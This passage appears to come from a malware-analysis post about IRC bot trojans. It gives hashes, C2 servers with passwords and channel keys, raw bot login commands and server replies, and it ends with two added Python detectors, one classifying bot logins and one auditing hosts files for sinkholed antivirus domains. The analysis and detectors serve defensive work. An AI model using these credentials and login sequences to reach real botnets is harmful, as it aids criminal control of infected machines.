    SHA256: 4f0b51e957a02fee49cb8592ac21b62ece061a65ad2906e293d60fc788086932
    ssdeep: 3072:ShfIevZrVCaTRUMnhWfTqLzb8OjDOr8S3mQNkjpebRrgwpHQerXTj4QFn7:UfIeRr1Rxnwf2LkOjDOrDrjjZd7


    IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk#, as shown above (copies itself as c:\SW\EET\GOx.exe).

  • packeds.exe
    Code:
    File size: 104960 bytes
    MD5...: bdf0b056db6ff48dd49eb59d80198801
    SHA1..: ad1d94667149203db52521bc7bb68ba45da3464c
    SHA256: 24c00fbd81242404778a6233e00bf1768c45b089f09c4a40e17bb735dd46d15b


    • IRC server: sik.totalunix.net:6969 (64.120.6.42)
    • Server password: letmein
    • Channel: ##spread##
    • Channel key: spread
    • Nickname format: [00|%[country]|%[number 6]] (example: [00|USA|189918])


    Code:
    PASS letmein
    NICK [00|USA|189918]
    USER XP-7167 * 0 :TEST
    MODE [00|USA|189918] -ix
    JOIN ##spread## spread


    sik.totalunix.net:6969 wrote:
    :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
    :irc.priv8net.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :irc.priv8net.com 001 [00|USA|189918]
    :irc.priv8net.com 002 [00|USA|189918] :               M0dded by uNkn0wn Crew             
    :irc.priv8net.com 003 [00|USA|189918]
    :irc.priv8net.com 004 [00|USA|189918] :          www.uNkn0wn.eu - iD@uNkn0wn.eu          
    :irc.priv8net.com 005 [00|USA|189918]
    :irc.priv8net.com 005 [00|USA|189918]
    :irc.priv8net.com 005 [00|USA|189918]
    :irc.priv8net.com 422 [00|USA|189918] :MOTD File is missing
    :[00|USA|189918] MODE [00|USA|189918] :+iwxG
    PING :irc.priv8net.com


    Backup addresses used by trojans that connect to this server:
    • idem0.p0cetak.eu:5900


  • pi.exe
    Code:
    File size: 8192 bytes
    MD5...: fcd447ae3660619092112b682e2d205d
    SHA1..: bc6efe2eac957de20406f1b767a2f58f18211515
    SHA256: b5a668a1df388b17cb1edd0bde321f198a7c54bfd5f9b8b397f81ac2cfb63b2a
    ssdeep: 192:0JGc1Zl2+VAfNxl1THs6xgzgVGjPlRsgL76InQAzXs:0JGcMJxDTHfRmCCxc


    Poison Ivy, server: terkejen.no-ip.biz:15963 (the trojan copies itself as %systemroot%\msconf.exe).

  • PS.exe
    Code:
    File size: 54784 bytes
    MD5...: 51ffbd0f1625fd375184806aa3380110
    SHA1..: d2455f7d2b1d617530731933292da58ff14d24aa
    SHA256: 45303bfb9cb8ebf1a5ec2cf2f4470fcd1f9b665c5cb57b2ec5bd0c84c120982c
    ssdeep: 768:uDI8Vu6GeZzvFK3bufjMAho6+csSY3XlcDktNSXo4kw17t9OncW1wMdW:uDv4CfIdlpNSXoodeG8


    • IRC server: huxor.psybnc.cz:3211
    • Server password: HEHE
    • Channel: #pstore#
    • Channel key: VrX
    • Nickname format: [00|%[country]|OS|%[number 6]] (example: [00|USA|XP|189918])


    Code:
    PASS HEHE
    NICK [00|USA|XP|189918]
    USER sxgxtfj * 0 :TEST
    MODE [00|USA|XP|189918] +iR
    JOIN #pstore# VrX


  • reptile.exe
    Code:
    File size: 38400 bytes
    MD5...: 012f8be481d8523b45e9d67cdc1a2f20
    SHA1..: b0c0c19e991d4671e23233128de39388171a4b6a
    SHA256: 4a0cc4726322af0ef86882b4b34d2a409257188a5783e313679fec4b155e5b03
    ssdeep: 768:nXO887OPsw72aMB0V1HU6oHfFnapQkDqLUwuwBBga1Z9pF6137wqYBvJ:1wOUwjpU6oHJaCHBBgUZI137wz


    IRC bot that connects to irc://sik.totalunix.net:6969/##spread##, as shown above.

  • snp.exe
    Code:
    File size: 383066 bytes
    MD5...: 671eefbc4c8edc2098a7379f8431ab35
    SHA1..: 20338f56ae3b6d74f68de7cdfedf8049bfd8bc50
    SHA256: e3a91eb27c49012490710bfb5b63998664a8e90be981ff74984e7730d1d386e8
    ssdeep: 6144:qjUJiNMHrkLBer+NaGvTZgZMnNQHHMHHH9GGGGGGGGGGGGGGGGGGGGGGGGGGGGGi:PJ0krKS+z7ZgIZ8g/


    Dropper for the reptile.exe trojan (requires the dotCrap framework, file saved: 954158reptile.exe; "Copyright © Thec0re 2009").

  • soul.exe (compiled: F:\Uniq Callapibyname and RunPE Generator\D0LV9G.vbp )
    Code:
    File size: 90151 bytes
    MD5...: 836bb93cd4b2b5754c73ab8b0c01e5df
    SHA1..: b3857f7e604431cdc4f2281a6af51aaeea3f1860
    SHA256: de6430ca2790602a7fdcf9e063df032fe5450b17b0cd0e95863cafd2e02e7649
    ssdeep: 1536:+imVenXB+nxpT2khCmLNzcn9po32aqxwPivVdGQC15D33aenA:+xen0n2khCmpzc9pJaqWKQbD33nA


    • IRC server: cyber-gods.x0rg.com:6667 (93.190.143.50)
    • Channel: #c
    • Nickname format: [INF|%[country]|%[OS]|%[computername]|%[number 6]] (example: [INF|USA|XP|TEST|189918])


    Code:
    NICK [INF|USA|XP|TEST|189918]
    USER twizt * 0 :TEST
    MODE [INF|USA|XP|TEST|189918] -ix
    JOIN :#c


    cyber-gods.x0rg.com:6667 wrote:
    :001 get.lost
    002 002 002
    003 003 003
    004 004 004
    005 005 005
    005 005 005
    005 005 005
    PING 422 MOTD


  • svchost.exe
    Code:
    File size: 397355 bytes
    MD5...: 14dfee6ee798ae0e8e1ddb7ca0346cf2
    SHA1..: d1fa30386c924da83203f3803572efc9a025fd4a
    SHA256: 5d0bd9daa8c57713cdb587f8848ac506c5dc7dcfcc5177a80b52145debb69072
    ssdeep: 6144:TTfAlKngqRCKP7rVuVrvIXaCLcoxHho9GvlQIYHRLu/j7tAQLPso3aIKs:TbY3aC87rVuVcXNcgo9SlOFu/vVbsoKo


    This trojan copies itself as %systemroot%\sdra64.exe, it has a ring3 rootkit, and it tries to get a config file from http://secure-gov.com/picture/configs.bin (404 when I checked).

  • Sweet-Ogard.exe
    Code:
    File size: 13312 bytes
    MD5...: 897b080dbad7f421c00a6d2a5a725339
    SHA1..: 4dbebca5bdf7a2ab3ceae71b167e431b64eb7558
    SHA256: 0f0982517bf4c423e2ffcf2b64ee50369673fac21718dc9b731f9f5e0b454dc4
    ssdeep: 384:1XRAqDJFf/3VDxUnmJW6+aNZ/ZAnc5x7p:LA6Ff/3VDxUnd6+aNZ/uI


    IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk#, as shown above.

  • unfud.exe
    Code:
    File size: 90000 bytes
    MD5...: 704cecf2d87b1f82969c7297c23fcb6a
    SHA1..: 68bba53b2c8a2bc5957b64eba02ba7bf6cd1fa22
    SHA256: b121c3976cc27d42e690d295e79f828e07d769646204c9a7187609a7d356b033
    ssdeep: 1536:VWG6qTWoK5cZIlHl3uFh2tYrGoXqVv2ObVdQWZHdPY9mv:VWG6pHRF+S3vtzldPqm


    This should be a dropper for uNkbot.exe but it doesn't load because its PE headers were edited.

  • uNkbot.exe
    Code:
    File size: 45568 bytes
    MD5...: 442241cd317180e90f88036aa1b89b0b
    SHA1..: f1bfce26411310cfc8c51fe12f00036d1de77958
    SHA256: 9ed08db21b896bf755767ffbcfa371e275d8bb25c90d8387ce4a7b69c1e31cce
    ssdeep: 768:C+nwtwC5Hh0FdKkW1U6IhD3y4khSIb7+WNB5rWtajbMHX:BwtwC5BwKkW1U6IhrqHWKBB9jbW


    This trojan works only after a restart (it saves itself as %windir%\h1t3m.exe but it tries to execute %windir%h1t3m.exe).
    • IRC server: mandown.homeip.net:5900 (81.229.71.165)
    • Server password: darksons
    • Channel: #unk
    • Channel key: uNkb0t
    • Nickname format: [00|%[country]|%[OS]%[number 6]] (example: [00|USA|XP|189918])
    • Login password for bots: rewt


    Code:
    PASS darksons
    NICK [00|USA|XP|189918]
    USER sxgxtfj * 0 :TEST
    MODE [00|USA|XP|189918] +ix
    JOIN #unk uNkb0t


    mandown.homeip.net:5900 wrote:
    :irc.oc256.com NOTICE AUTH :*** Looking up your hostname...
    :irc.oc256.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    PING :917DF3D2
    :irc.oc256.com 001 [00|USA|XP|189918] :Welcome to the oc256 IRC Network [00|USA|XP|189918]!sxgxtfj@89.123.154.82
    :irc.oc256.com 002 [00|USA|XP|189918] :Your host is irc.oc256.com, running version Unreal3.2.8.1
    :irc.oc256.com 003 [00|USA|XP|189918] :This server was created Sun May 24 15:01:33 2009
    :irc.oc256.com 004 [00|USA|XP|189918] irc.oc256.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.oc256.com 005 [00|USA|XP|189918] UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=25 CHANLIMIT=#:25 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.oc256.com 005 [00|USA|XP|189918] WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=oc256 CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.oc256.com 005 [00|USA|XP|189918] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
    :irc.oc256.com 251 [00|USA|XP|189918] :There are 1 users and 526 invisible on 1 servers
    :irc.oc256.com 252 [00|USA|XP|189918] 2 :operator(s) online
    :irc.oc256.com 254 [00|USA|XP|189918] 6 :channels formed
    :irc.oc256.com 255 [00|USA|XP|189918] :I have 527 clients and 0 servers
    :irc.oc256.com 265 [00|USA|XP|189918] :Current Local Users: 527  Max: 4087
    :irc.oc256.com 266 [00|USA|XP|189918] :Current Global Users: 527  Max: 4087
    :irc.oc256.com 375 [00|USA|XP|189918] :- irc.oc256.com Message of the Day -
    :irc.oc256.com 372 [00|USA|XP|189918] :- 27/7/2009 18:27
    :irc.oc256.com 372 [00|USA|XP|189918] :- d
    :irc.oc256.com 376 [00|USA|XP|189918] :End of /MOTD command.
    :[00|USA|XP|189918] MODE [00|USA|XP|189918] :+i

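The IRC logins captured throughout the post share a pattern: a NICK built from a fixed template plus random digits or letters, then a JOIN to a known channel. The following is an added example, not code from the post: it converts the post's own placeholder notation (%[number 5], %[letter 8], %[country], %[OS], %[computername]) into regular expressions and classifies a captured client login by channel and nick. The sample sessions are modelled on the post's logins (colour-code bytes dropped from one USER line) plus two constructed ones; the two-to-three-letter country code and the OS slot in the #pstore# and #unk templates are assumptions.

```python
"""Classify captured IRC client logins against the bot nick templates in the post."""
import re

# Templates keyed by the C2 channel the bot joins, copied from the post.
# Assumption: the post's example nicks for #pstore# and #unk ([00|USA|XP|189918])
# show an OS token with a '|' separator, so those two are written that way here.
NICK_TEMPLATES = {
    "#TuX":       "[USA|00|P|%[number 5]]",
    "#test":      "TesT%[number 7]",
    "#FUCk#":     "VirUs-%[letter 8]",
    "#LinuX#":    "[nLh-VNC]%[letter 6]",
    "#darksons":  "[%[country]|00|P|%[number 5]]",
    "#1337":      "[1337]%[number 9]",
    "#fLOOD#":    "%[letter 3|4]",
    "##spread##": "[00|%[country]|%[number 6]]",
    "#pstore#":   "[00|%[country]|%[OS]|%[number 6]]",
    "#c":         "[INF|%[country]|%[OS]|%[computername]|%[number 6]]",
    "#unk":       "[00|%[country]|%[OS]|%[number 6]]",
}

# %[kind N] or %[kind N|M]: kind plus an optional length or length range.
_PLACEHOLDER = re.compile(
    r"%\[(number|letter|country|OS|computername)(?:\s+(\d+)(?:\|(\d+))?)?\]")


def template_to_regex(template):
    """Turn one %[...] template into an anchored compiled regex."""
    parts, pos = [], 0
    for m in _PLACEHOLDER.finditer(template):
        parts.append(re.escape(template[pos:m.start()]))   # literal text in between
        kind, lo, hi = m.group(1), m.group(2), m.group(3)
        if kind == "number":
            cls = r"\d"
        elif kind == "letter":
            cls = "[A-Za-z]"
        elif kind == "country":
            cls, lo, hi = "[A-Z]", "2", "3"        # assumption: code such as USA or DE
        else:                                      # OS / computername: free-form token
            parts.append(r"[^|\]]+")
            pos = m.end()
            continue
        parts.append("%s{%s,%s}" % (cls, lo, hi or lo))
        pos = m.end()
    parts.append(re.escape(template[pos:]))
    return re.compile("^" + "".join(parts) + "$")


NICK_REGEX = {chan: template_to_regex(t) for chan, t in NICK_TEMPLATES.items()}


def match_nick(nick):
    """Channels whose nick template fits this nick (several templates can overlap)."""
    return [chan for chan, rx in NICK_REGEX.items() if rx.match(nick)]


def parse_login(lines):
    """Pull PASS / NICK / JOIN (channel and key) out of one client-side login."""
    info = {"pass": None, "nick": None, "channel": None, "key": None}
    for raw in lines:
        fields = raw.strip().split()
        if not fields:
            continue
        cmd = fields[0].upper()
        if cmd == "PASS" and len(fields) > 1:
            info["pass"] = fields[1]
        elif cmd == "NICK" and len(fields) > 1:
            info["nick"] = fields[1]
        elif cmd == "JOIN" and len(fields) > 1:
            info["channel"] = fields[1].lstrip(":")   # some bots send "JOIN :#c"
            info["key"] = fields[2] if len(fields) > 2 else None
    return info


def classify_login(lines):
    """'known-bot' needs channel and nick template to agree; a nick that fits a
    template but joins another channel is only a 'possible-variant', because
    short nicks like 'zks' fit the #fLOOD# template by chance."""
    info = parse_login(lines)
    hits = match_nick(info["nick"]) if info["nick"] else []
    if info["channel"] in hits:
        verdict = "known-bot"
    elif hits:
        verdict = "possible-variant"
    else:
        verdict = "no-match"
    return {**info, "nick_hits": hits, "verdict": verdict}


# First two sessions follow the logins captured in the post; the rest are constructed.
SAMPLE_SESSIONS = {
    "aol.exe": ["PASS helm562ray", "NICK [USA|00|P|36883]", "USER XP-3776 * 0 :TEST",
                "MODE [USA|00|P|36883] +ix", "JOIN #TuX an124"],
    "FuCk-CrPtD.exe": ["NICK VirUs-dfjhmchi", 'USER VirUs "" "tfy" :Coded By VirUs',
                       "JOIN :#FUCk#"],
    "variant": ["PASS x", "NICK [USA|00|P|11111]", "USER a * 0 :a", "JOIN #elsewhere"],
    "benign": ["NICK alice", "USER alice 0 * :Alice", "JOIN #python"],
}
```

Running `classify_login` over each entry of `SAMPLE_SESSIONS` gives known-bot for the first two, possible-variant for the third and no-match for the last.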

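The imbot.exe entry above shows the classic trick of pinning antivirus and online-scanner domains to 127.0.0.1 in the hosts file. The following is an added example, not code from the post: it parses a hosts file, reports security-vendor names that resolve to loopback or 0.0.0.0, and lists entries that occur more than once (the post notes every entry is added twice). The domain suffix list is taken from the hosts file quoted in the post; the sample hosts content is constructed.

```python
"""Audit a Windows hosts file for the AV-vendor sinkholing seen in imbot.exe."""
import ipaddress
from collections import Counter

# Suffixes from the hosts file quoted in the post; any subdomain of these counts.
SECURITY_DOMAINS = (
    "symantec.com", "symantecliveupdate.com", "sophos.com", "mcafee.com",
    "viruslist.com", "f-secure.com", "kaspersky.com", "kaspersky-labs.com",
    "avp.com", "networkassociates.com", "ca.com", "my-etrust.com", "nai.com",
    "trendmicro.com", "grisoft.com", "virustotal.com", "virscan.org",
    "novirusthanks.org", "jotti.org", "threatexpert.com",
)


def parse_hosts(text):
    """Yield (address, hostname) pairs; comments, blanks and malformed lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        if not line:
            continue
        addr, *names = line.split()
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue                             # not an address: ignore the line
        for name in names:
            yield addr, name.lower().rstrip(".")


def is_security_domain(host):
    """Exact match or subdomain; the leading dot stops 'www.mca.com' matching 'ca.com'."""
    return any(host == d or host.endswith("." + d) for d in SECURITY_DOMAINS)


def is_sinkhole(addr):
    """127.0.0.0/8, ::1 and 0.0.0.0 all make the name unreachable."""
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_unspecified


def audit_hosts(text):
    """Return the sinkholed security domains and the duplicated entries."""
    entries = list(parse_hosts(text))
    counts = Counter(entries)
    blocked = sorted({n for a, n in entries if is_sinkhole(a) and is_security_domain(n)})
    duplicates = sorted({n for (a, n), k in counts.items() if k > 1})
    return {"entries": len(entries), "blocked": blocked, "duplicates": duplicates}


# Constructed sample modelled on the post's quoted hosts file, plus benign lines.
SAMPLE_HOSTS = """\
# localhost name resolution
127.0.0.1       localhost
::1             localhost
127.0.0.1 www.symantec.com
127.0.0.1 www.symantec.com
127.0.0.1 liveupdate.symantec.com
0.0.0.0   www.virustotal.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
192.168.1.10 intranet.example.test   # ordinary internal entry
"""
```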